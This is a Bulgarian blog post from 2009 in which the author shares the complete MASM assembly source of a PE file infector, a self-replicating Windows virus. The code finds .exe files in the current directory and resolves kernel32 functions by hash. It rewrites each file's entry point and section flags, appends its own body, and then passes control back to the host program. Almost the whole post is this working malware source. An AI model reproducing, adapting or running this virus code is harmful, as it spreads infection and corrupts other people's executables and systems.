събота, 14 март 2009 г.

Моят първи PE Инфектор




Това е моят първи PE инфектор, написан на чист асемблер.
Спецификации: може да инфектира по един файл наведнъж и инфектира само файлове в същата директория.
Асемблирал съм го с MASM.
А ето и кода:


.686p
.mmx
.MODEL flat,stdcall
OPTION CASEMAP:NONE
include kernel32.inc
includelib kernel32.lib
Include windows.inc
.code
blabla label near
string db "*.exe",0
ep dd ?
var dd 0000003ch
varr dd ?
entrypoint dd ?
newep dd ?
wfd WIN32_FIND_DATA
start:
nop
call delta
delta:
pop ebp
sub ebp,offset delta
pop esi
and esi,0FFF00000h
push esi
add esi,[esi+3Ch]
add esi,078h
mov edi,dword ptr [esi]
pop esi
add edi,esi
push esi
push edi
mov eax,[ebp+entrypoint]
mov [ep+ebp],eax
xor eax,eax
mov ebx,0903ebb2eh
call [GetThisFuckingAPIs]
lea ebx,[wfd+ebp]
lea eax,[string+ebp]
call goon ;FindFirstFileA
movd mm2,eax
add edx,1h
movd mm7,edx
pop edi
pop esi
push eax
push esi
push edi
mov ebx,02BD833FBh
xor eax,eax
call [GetThisFuckingAPIs]
movd mm,ecx ;CreateFileA
mov edi,ecx
OpenMyFile:
movd ecx,mm
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
lea eax,[wfd.cFileName+ebp]
push eax
call ecx ;CreateFileA
cmp eax,0FFFFFFFFh
jz test123
jmp notend
test123:
cmp ebp,0h
jz gogo
mov eax,[ep+ebp]
jmp eax
gogo:
push 0
Call ExitProcess
notend:
xor edx,edx
call Infection
movd edx,mm7
test edx,edx
jz here
add edx,01h
sub edx,edx
movd mm7,edx
pop edi
pop esi
push esi
push edi
mov ebx,0A38B216Eh
call [GetThisFuckingAPIs]
movd mm1,ecx ;FindNextFileA
pop edi
pop esi
pop eax
push esi
push edi
FindNextFile1:
movd ecx,mm1
lea ebx,[wfd+ebp]
call goon ;FindNextFileA
jmp OpenMyFile
goon proc
push ebx
push eax
call ecx
Ret
goon EndP
GetThisFuckingAPIs:
mov ecx,[edi+18h]
mov edx,[edi+20h]
add edx,esi
push ecx
push esi
push edi
mov edi,esi
mov esi,[edx]
add esi,edi
lol:
xor edi,edi
loop1:
lodsb
mov ecx,eax
add edi,eax
rol edi,cl
test eax,eax
jne loop1
cmp edi,ebx
je found
dec dword ptr[esp+08h]
jne lol
found:
pop EBX
pop EAX
pop ECX
mov edx,[ebx+18h]
mov edi,[ebx+24h]
add edi,eax
sub edx,ecx
shl edx,1
add edi,edx
movzx edx,word ptr[edi]
mov ebx,[ebx+1ch]
add ebx,eax
shl edx,2
add ebx,edx
xor ecx,ecx
add ecx,[ebx]
add ecx,eax
xor eax,eax
ret
here:
movd eax,mm2
jmp FindNextFile1
ret
Infection proc
push ebp
push eax
mov ebp,esp
add ebp,0Ch
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0C4D9B34Ch ;ReadFile
call GetThisFuckingAPIs
movd mm3,ecx
mov esi,[ebp]
sub ebp,04h
mov edi,[ebp]
mov ebx,093FAD32Ch ;WriteFile
call GetThisFuckingAPIs
movd mm4,ecx
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0119E9E92h ;CloseHandle
call GetThisFuckingAPIs
movd mm5,ecx
mov esi,[ebp]
sub ebp,04h
mov edi,[ebp]
mov ebx,0FD641C15h ;SetFilePointer
call GetThisFuckingAPIs
movd mm6,ecx
mov edi,[ebp]
add ebp,04h
mov esi,[ebp]
mov ebx,0C93E80D5h ;CancelIo
call GetThisFuckingAPIs
pop eax
pop ebp
push ecx
push ebp
push eax
pop eax
pop ebp
movd ecx,mm6
movd ecx,mm6
push eax
Reading:
call SetFilePointer1 ;SetFilePointer
mov edi,4h
mov eax,[esp]
call ReadFile1 ;ReadFile
pop eax
push [ebp+ var]
push eax
add [ebp+var],28h
movd ecx,mm6
pop eax
push eax
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov esi,[ebp+var]
mov [ebp+entrypoint],esi
pop eax
pop [ebp+var]
push [ebp+var]
add [ebp+var],34h
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1
mov esi,[ebp+var]
add [ebp+entrypoint],esi
pop eax
pop [ebp+var]
push eax
movd ecx,mm6
pop eax
push [var+ebp]
push eax
add [var+ebp],6h
call SetFilePointer1 ;SetFilePointer
xor eax,eax
mov [ebp+varr],eax
mov [ebp+var],eax
pop eax
push eax
mov edi,2h
call ReadFile1;ReadFile
pop ecx
pop edx
push edx
push ecx
mov eax,[ebp+var]
mov ebx,28h
dec eax
imul eax,ebx
add edx,0F8h
add edx,eax
add edx,8h
mov esi,edx
pop eax
push edx
push eax
add edx,4h
mov [var+ebp],edx
pop eax
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov edx,[ebp+var]
add edx,159h
mov [ebp+newep],edx
pop eax
pop edx
push edx
push eax
add edx,8h
mov [var+ebp],edx
pop eax
push eax
movd ecx,mm6
call SetFilePointer1
pop eax
push eax
mov edi,4h
call ReadFile1
mov edx,[ebp+var]
add [ebp+newep],edx
movd ecx,mm6
pop eax
pop edx
pop [var+ebp]
push edx
push eax
add [ebp+var],28h
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edx,[newep+ebp]
mov [var+ebp],edx
call WriteFile1 ; WriteFile
pop eax
pop edx
push eax
pop eax
push eax
mov [var+ebp],edx
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov ebx,[ebp+var]
pop eax
push eax
mov [ebp+var],esi
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
mov [ebp+var],ebx
mov [ebp+varr],4h
pop eax
push eax
add [ebp+var],600h
pop eax
push [ebp+var]
push eax
call WriteFile1 ;WriteFile
add esi,8h
mov [var+ebp],esi
movd ecx,mm6
pop eax
push eax
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop eax
push eax
mov edi,4h
call ReadFile1 ;ReadFile
mov [ebp+varr],4h
pop eax
push eax
xchg [ebp+var],esi
push [ebp+var]
movd ecx,mm6
call SetFilePointer1 ;SetFilePointer
pop [ebp+var]
pop eax
push [ebp+var]
push eax
mov [ebp+var],esi
pop ecx
pop edi
pop eax
push edi
push ecx
push ecx
mov ecx,200h
xchg ecx,edx
xor edx,edx
div ecx
inc eax
imul eax,edx
xchg ecx,edx
mov [ebp+var],eax
call WriteFile1 ;WriteFile
pop eax
pop [ebp+var]
push eax
add [ebp+var],14h
movd ecx,mm6
call SetFilePointer1 ; SetFilePointer
mov [ebp+var],0E00000E0h
pop eax
push eax
call WriteFile1 ;WriteFile
pop eax
push eax
movd ecx,mm6
xchg [var+ebp],esi
push 2h
push 0h
push 0h
push eax
call ecx ;SetFilePointer
pop eax
pop ecx
push eax
push eax
call ecx ;CancelIo
mov [var+ebp],3ch
mov eax,[esp]
push 0h
lea ecx,[varr+ebp]
push ecx
push 600h
lea ebx,[blabla+ebp]
push ebx
push eax
movd ecx,mm4
call ecx ;WriteFile
pop eax
push eax
movd ecx,mm5
push eax
call ecx ;CloseHandle
Ret
SetFilePointer1:
push 0h
push 0h
push [var+ebp]
push eax
call ecx ;SetFilePointer
ret
ReadFile1:
movd ecx,mm3
push 0h
lea ebx,[varr+ebp]
push ebx
lea edx,[var+ebp]
push edi
push edx
push eax
call ecx ;ReadFile
ret
WriteFile1: ;WriteFile
push 0h
lea ecx,[varr+ebp]
push ecx
push 4h
lea ebx,[var+ebp]
push ebx
push eax
movd ecx,mm4
call ecx
ret
Infection EndP
End start
